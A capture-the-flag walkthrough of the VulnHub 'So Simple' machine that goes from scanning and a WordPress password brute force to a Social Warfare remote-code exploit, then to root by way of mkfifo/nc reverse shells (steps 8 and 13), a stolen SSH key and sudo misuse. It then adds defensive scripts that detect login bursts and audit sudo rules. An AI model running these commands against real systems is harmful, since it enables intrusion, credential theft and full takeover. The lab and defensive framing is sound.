CTF Walk Through - So Simple - VulnHub

Machine Link : https://www.vulnhub.com/entry/so-simple-1,515/

STEP1
arp-scan -l
FINDING
----------------------------------------------------------------------------------------------------------
STEP2
nmap -p- -Pn -A -T4 -sSV
FINDING
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
----------------------------------------------------------------------------------------------------------
STEP3
dirb
FINDING
site is a wordpress site
----------------------------------------------------------------------------------------------------------
STEP4
wpscan --url -e at -e ap -e u
FINDING
Upload directory has listing enabled
admin -- user
max -- user
----------------------------------------------------------------------------------------------------------
STEP5
wpscan --url -U max,admin -P /usr/share/wordlists/rockyou.txt
FINDING
plugins -- social-warfare -- The version is out of date -- Version: 3.5.0
plugins -- simple-cart-solution -- The version is out of date -- Version: 0.2.0
[SUCCESS] - max / opensesame -- password found
----------------------------------------------------------------------------------------------------------
STEP6
logging in does not help with anything
searchsploit Social Warfare 3.5
FINDING
WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution | php/webapps/46794.py
----------------------------------------------------------------------------------------------------------
STEP7
download the exploit from exploitdb
python2 46794.py -h
FINDING
Options:
  -h, --help                   show this help message and exit
  -t TARGET, --target=TARGET   Target Link
  --payload-uri=PAYLOAD        URI where the file payload.txt is located.
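The wordlist attack in STEP5 shows up on the web server as a burst of POST requests to the login endpoints from one source address, and that burst is what a defender would alert on. The script below is an added example, not part of the original walkthrough: it parses Apache combined-format access log lines and counts login POSTs per source inside a sliding time window. The sample log lines, the threshold and the window length are all assumptions.

```python
"""Flag WordPress login brute forcing in Apache combined-format access logs.

Added example (not from the walkthrough). Counts POST requests to the login
endpoints per source address inside a sliding time window; a wordlist attack
like the one in STEP5 produces dozens of such POSTs per minute, while a human
produces a handful. Threshold, window and the sample log are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log line: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints a WordPress password attack hits: the login form, and the XML-RPC
# interface, which tools prefer because one request can test many passwords.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Return (ip, timestamp, method, path) or None for a non-matching line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # drop the query string
    return m.group("ip"), ts, m.group("method"), path


def detect_login_bursts(lines, threshold=20, window_seconds=60):
    """Map each offending source IP to the time it first crossed the threshold.

    Status codes are deliberately ignored: a failed wp-login.php attempt
    returns 200 (the form again), so volume, not status, is the signal.
    """
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs in window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method != "POST" or path not in LOGIN_PATHS:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts


def constructed_log(attempts=25):
    """Build a sample log: one noisy source plus one ordinary visitor (constructed)."""
    fmt = ('{ip} - - [13/Jul/2020:10:00:{sec:02d} +0000] '
           '"{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"')
    lines = [fmt.format(ip="10.0.0.9", sec=0, method="GET", path="/",
                        status=200, ua="Mozilla/5.0")]
    for i in range(attempts):   # one login POST per second from the scanner
        lines.append(fmt.format(ip="10.0.0.5", sec=i, method="POST",
                                path="/wp-login.php", status=200, ua="WPScan v3.8"))
    # a single legitimate login (302 redirect on success) from the visitor
    lines.append(fmt.format(ip="10.0.0.9", sec=30, method="POST",
                            path="/wp-login.php", status=302, ua="Mozilla/5.0"))
    return lines


if __name__ == "__main__":
    for ip, when in detect_login_bursts(constructed_log()).items():
        print(f"login burst from {ip} at {when.isoformat()}")
```

On a real host the lines would come from the Apache access log instead of constructed_log(); the ordinary visitor with one POST never trips the threshold, while the scanner does on its twentieth attempt.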
----------------------------------------------------------------------------------------------------------
STEP8
create payload.txt on the desktop with:
<pre>system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 4321 >/tmp/f")</pre>
start a python3 server -- python3 -m http.server 80
on a new terminal start the listener -- nc -nvlp 4321
on another terminal upload the payload -- python2 46794.py -t --payload-uri=
and get the shell on the nc listener
----------------------------------------------------------------------------------------------------------
STEP9
cd /home
ls -la
cat personal.txt
FINDING
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=
https://hashes.com/en/decrypt/hash
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=:Hahahahaha, its not that easy !!!
----------------------------------------------------------------------------------------------------------
STEP10
cd max
ls -la
cd .ssh
cat id_rsa
copy it and paste it on the local machine
chmod 600 id_rsa
----------------------------------------------------------------------------------------------------------
STEP11
ssh max@<target-ip> -i id_rsa
ls -la
cat user.txt
073dafccfe902526cee753455ff1dbb0
sudo -l
(steven) NOPASSWD: /usr/sbin/service
----------------------------------------------------------------------------------------------------------
STEP12
sudo -u steven /usr/sbin/service ../../bin/sh
whoami
steven
sudo -l
(root) NOPASSWD: /opt/tools/server-health.sh
----------------------------------------------------------------------------------------------------------
STEP13
create a folder tools and under it the script server-health.sh
cd /opt
mkdir tools
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 4322 >/tmp/f" > tools/server-health.sh
chmod +x tools/server-health.sh
(after the listener from STEP14 is running) sudo /opt/tools/server-health.sh
----------------------------------------------------------------------------------------------------------
STEP14
open nc on a new terminal
nc -nvlp 4322
whoami
root
cd /root
cat flag.txt
[ASCII-art banner from flag.txt]
Easy box right? Hope youve had fun! Show me the flag on Twitter @roelvb79
----------------------------------------------------------------------------------------------------------
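Both privilege escalations above come from sudo rules: STEP12 relies on NOPASSWD for /usr/sbin/service, which runs the init script named by its argument (so a relative path reaches /bin/sh), and STEP13 relies on a NOPASSWD rule whose target /opt/tools/server-health.sh does not exist under a directory steven can write to. The script below is an added example, not part of the original walkthrough or of the box: it parses sudo -l style rule lines and reports both patterns so an administrator can find them before someone else does. The sample rules and the stand-in permission bits are constructed; the list of argument-executing binaries is an assumption kept deliberately short.

```python
"""Audit sudo rules for the two weaknesses used in STEP11 to STEP13.

Added example (not from the walkthrough). It parses 'sudo -l' style rule
lines and reports (a) NOPASSWD on a binary that executes a path given as its
argument, which is what /usr/sbin/service does with the init script name it
receives, and (b) rules whose target script is missing or sits under a
directory others can write, so the rule can be satisfied by a planted file.
The sample rules and the stand-in filesystem modes are constructed.
"""
import os
import re
import stat
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Constructed: the two 'sudo -l' results seen on the box plus one benign rule.
SAMPLE_SUDO_L = """\
User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service
User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh
    (root) /usr/bin/apt update
"""

# Constructed permission bits standing in for the box: /opt/tools and the
# health script do not exist, and /opt is group- and world-writable.
FAKE_MODES: Dict[str, int] = {
    "/": 0o755, "/usr": 0o755, "/usr/sbin": 0o755, "/usr/sbin/service": 0o755,
    "/usr/bin": 0o755, "/usr/bin/apt": 0o755, "/opt": 0o777,
}

# Binaries that run whatever path they are handed (assumed, short list);
# NOPASSWD on one of these is NOPASSWD on arbitrary commands as the run-as user.
EXECUTES_ARGUMENT = {"/usr/sbin/service", "/usr/bin/env", "/bin/sh", "/bin/bash"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)")


@dataclass
class Finding:
    runas: str
    command: str
    issue: str


def fake_mode(path: str) -> int:
    """Stand-in for real_mode: raises FileNotFoundError like os.stat would."""
    if path not in FAKE_MODES:
        raise FileNotFoundError(path)
    return FAKE_MODES[path]


def real_mode(path: str) -> int:
    """Permission bits of a real path (used when auditing an actual host)."""
    return stat.S_IMODE(os.stat(path).st_mode)


def others_can_write(mode: int) -> bool:
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def nearest_existing(path: str, mode_of: Callable[[str], int]) -> Tuple[str, int]:
    """Walk up from path to the first component that exists; return it and its mode."""
    p = path
    while True:
        try:
            return p, mode_of(p)
        except FileNotFoundError:
            parent = os.path.dirname(p)
            if parent == p:
                raise
            p = parent


def audit_sudo_rules(sudo_l_output: str,
                     mode_of: Callable[[str], int] = real_mode) -> List[Finding]:
    findings: List[Finding] = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m is None:
            continue
        runas, cmd = m.group("runas"), m.group("cmd")
        nopasswd = "NOPASSWD" in m.group("tags")
        if not cmd.startswith("/"):
            findings.append(Finding(runas, cmd, "non-absolute command spec (e.g. ALL); review by hand"))
            continue
        if nopasswd and cmd in EXECUTES_ARGUMENT:
            findings.append(Finding(runas, cmd, "NOPASSWD on a binary that executes a caller-supplied path"))
        existing, mode = nearest_existing(cmd, mode_of)
        if existing != cmd:
            issue = f"target missing; nearest existing parent {existing} has mode {mode:04o}"
            if others_can_write(mode):
                issue += " and is writable by non-owners, so the target can be planted"
            findings.append(Finding(runas, cmd, issue))
        elif others_can_write(mode):
            findings.append(Finding(runas, cmd, f"target is group/world writable (mode {mode:04o})"))
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L, fake_mode):
        print(f"({f.runas}) {f.command}: {f.issue}")
```

Against the constructed input it reports the service rule and the missing, plantable health script, and stays quiet about the apt rule. On a real host, feed it the output of sudo -l and leave mode_of at its default so the checks run against the actual filesystem; the fix for both findings is the same in spirit: point NOPASSWD rules at a specific, root-owned, non-writable script with fixed arguments rather than at a launcher that takes a path.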

